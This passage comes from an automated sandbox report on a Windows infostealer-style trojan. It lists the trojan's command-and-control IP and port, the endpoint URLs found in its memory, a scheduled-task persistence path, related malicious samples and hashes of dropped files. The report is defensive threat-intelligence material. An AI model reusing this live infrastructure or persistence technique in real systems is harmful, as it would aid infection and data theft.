                    185.222.57.91:556153%VirustotalBrowse
                    http://185.222.57.91:556153%VirustotalBrowse
                    http://tempuri.org/1%VirustotalBrowse
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.222.57.91:55615/true
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    185.222.57.91:55615true
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ipinfo.io/ip%appdata%tfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/chrome_newtabtfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icotfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoustfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/CheckConnectResponsetfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://185.222.57.91:55615tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003322000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.datacontract.org/2004/07/tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXtfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/EnvironmentSettingstfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%tfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://ns.adobe.0/xmptfF3UBTdr8.exe, 00000009.00000002.2208269456.000000000191E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/envelope/WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002E31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Endpoint/CheckConnecttfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.ecosia.org/newtab/tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/VerifyUpdateResponsetfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/0tfF3UBTdr8.exe, WltfeVzR.exe.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/SetEnvironmentWltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/SetEnvironmentResponsetfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/GetUpdatesWltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002E31000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.ipify.orgcookies//settinString.RemovegtfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressingtfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/GetUpdatesResponsetfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://185.222.57.91:55615t-sqWltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponsetfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/VerifyUpdatetfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/0tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametfF3UBTdr8.exe, 00000000.00000002.2095978320.0000000003111000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2195910209.0000000003074000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/actor/nexttfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.222.57.91
                    		unknownNetherlands
                    		51447ROOTLAYERNETNLtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1501611
                    Start date and time:2024-08-30 08:01:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 44s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:20
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:tfF3UBTdr8.exe
                    renamed because original name is a hash value
                    Original Sample Name:05211f48dbbb4ef891db1e158ff87e28.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@21/103@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 93
                    • Number of non-executed functions: 11
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
                    • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    02:01:52API Interceptor37x Sleep call for process: tfF3UBTdr8.exe modified
                    02:01:59API Interceptor38x Sleep call for process: powershell.exe modified
                    02:02:03API Interceptor50x Sleep call for process: WltfeVzR.exe modified
                    08:02:00Task SchedulerRun new task: WltfeVzR path: C:\Users\user\AppData\Roaming\WltfeVzR.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.222.57.91rNgmoGJFYX.exeGet hashmaliciousNanocoreBrowse

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ROOTLAYERNETNL4Si6dGqcuy.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.102
                      lmec.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.171
                      CLgi.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.169
                      8XYOB9Lo1C.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                      • 45.137.22.179
                      5B8E6Z6ZdN.exeGet hashmaliciousRedLineBrowse
                      • 185.222.57.81
                      XAUnTZQny8.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                      • 45.137.22.253
                      Xf0VkRcuwx.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.164
                      SI6EttPCYd.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.108
                      wC3CMixoFK.exeGet hashmaliciousRedLineBrowse
                      • 45.137.22.167
                      7Pr8yHjO1v.exeGet hashmaliciousRedLineBrowse
                      • 185.222.57.151

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WltfeVzR.exe.log

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tfF3UBTdr8.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:true
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2232
                      Entropy (8bit):5.379401388151058
                      Encrypted:false
                      SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHxvIIwLgZ2KRHWLOug8s
                      MD5:AF15464AFD6EB7D301162A1DC8E01662
                      SHA1:A974B8FEC71BF837B8E72FE43AB43E447FC43A86
                      SHA-256:103A67F6744C098E5121D2D732753DFA4B54FA0EFD918FEC3941A3C052F5E211
                      SHA-512:7B5B7B7F6EAE4544BAF61F9C02BF0138950E5D7D1B0457DE2FAB2C4C484220BDD1AB42D6884838E798AD46CE1B5B5426CEB825A1690B1190857D3B643ABFAB37
                      Malicious:false
                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1aeapb0a.a5q.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sobvf4z.tqi.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
